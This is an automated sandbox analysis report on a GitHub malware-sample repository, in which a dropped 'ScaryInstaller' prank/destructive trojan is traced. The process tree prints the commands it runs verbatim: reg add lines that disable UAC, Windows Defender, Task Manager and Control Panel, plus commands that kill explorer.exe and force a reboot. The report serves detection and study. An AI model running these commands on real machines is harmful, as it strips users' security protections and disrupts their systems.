hxxps://github[.]com/pankoza2-pl/malwaredatabase-old

Analysis

max time kernel
158s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
07/03/2024, 14:17

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/pankoza2-pl/malwaredatabase-old

Score

10^/10

evasion ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	ScaryInstaller.exe

Executes dropped EXE 3 IoCs

pid	Process
5832	ScaryInstaller.exe
1156	CreepScreen.exe
3468	melter.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002329f-524.dat	upx
behavioral1/files/0x0009000000023292-531.dat	upx
behavioral1/files/0x0009000000023292-532.dat	upx
behavioral1/memory/5832-533-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx
behavioral1/memory/5832-558-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx
behavioral1/memory/5832-595-0x0000000000400000-0x0000000001DFD000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
81	raw.githubusercontent.com
82	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
4136	timeout.exe
1316	timeout.exe
820	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4572	taskkill.exe
744	taskkill.exe
2868	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "156"	LogonUI.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
5432	reg.exe
1500	reg.exe
2444	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 568482.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2368	vlc.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2140	msedge.exe
2140	msedge.exe
2160	msedge.exe
2160	msedge.exe
8	identity_helper.exe
8	identity_helper.exe
5560	msedge.exe
5560	msedge.exe
6080	msedge.exe
6080	msedge.exe
6080	msedge.exe
6080	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2368	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	4572	taskkill.exe
Token: SeDebugPrivilege	744	taskkill.exe
Token: SeDebugPrivilege	2868	taskkill.exe
Token: 33	4032	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4032	AUDIODG.EXE
Token: 33	2368	vlc.exe
Token: SeIncBasePriorityPrivilege	2368	vlc.exe
Token: SeShutdownPrivilege	3868	shutdown.exe
Token: SeRemoteShutdownPrivilege	3868	shutdown.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe
2160	msedge.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1156	CreepScreen.exe
2368	vlc.exe
2368	vlc.exe
2368	vlc.exe
2368	vlc.exe
920	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 3348	2160	msedge.exe	89
PID 2160 wrote to memory of 3348	2160	msedge.exe	89
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2908	2160	msedge.exe	90
PID 2160 wrote to memory of 2140	2160	msedge.exe	91
PID 2160 wrote to memory of 2140	2160	msedge.exe	91
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92
PID 2160 wrote to memory of 1916	2160	msedge.exe	92

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb68746f8,0x7ffcb6874708,0x7ffcb6874718
  2⤵
  PID:3348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
  2⤵
  PID:2908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
  2⤵
  PID:1916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:1632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:2080
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8
  2⤵
  PID:5060
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
  2⤵
  PID:216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
  2⤵
  PID:920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
  2⤵
  PID:2132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5940 /prefetch:8
  2⤵
  PID:1324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5932 /prefetch:8
  2⤵
  PID:4188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
  2⤵
  PID:5572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:5652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
  2⤵
  PID:5304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
  2⤵
  PID:5252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6284 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4852 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,4267540627623170163,8782080399135092673,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
  2⤵
  PID:3620

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3768

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2856

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2260

C:\Users\Admin\Downloads\ScaryInstaller.exe
"C:\Users\Admin\Downloads\ScaryInstaller.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5832
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\382D.tmp\creep.cmd" "
  2⤵
  - Checks computer location settings
  - Modifies registry class
  PID:3664
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4572
- - C:\Users\Admin\AppData\Local\Temp\382D.tmp\CreepScreen.exe
    CreepScreen.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:1156
- - C:\Windows\SysWOW64\timeout.exe
    timeout 5 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:4136
- - C:\Users\Admin\AppData\Local\Temp\382D.tmp\melter.exe
    melter.exe
    3⤵
    - Executes dropped EXE
    PID:3468
- - C:\Windows\SysWOW64\timeout.exe
    timeout 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1316
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im CreepScreen.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im melter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2868
- - C:\Program Files\VideoLAN\VLC\vlc.exe
    "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\382D.tmp\scarr.mp4"
    3⤵
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2368
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2336
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:5432
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:1500
- - C:\Windows\SysWOW64\reg.exe
    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:5356
- - C:\Windows\SysWOW64\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2444
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
    3⤵
    PID:1304
- - C:\Windows\SysWOW64\net.exe
    net user Admin /fullname:"IT'S TOO LATE!!!"
    3⤵
    PID:1472
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
      4⤵
      PID:5032
- - C:\Windows\SysWOW64\timeout.exe
    timeout 8 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:820
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3868

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x53c 0x530
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38d9055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

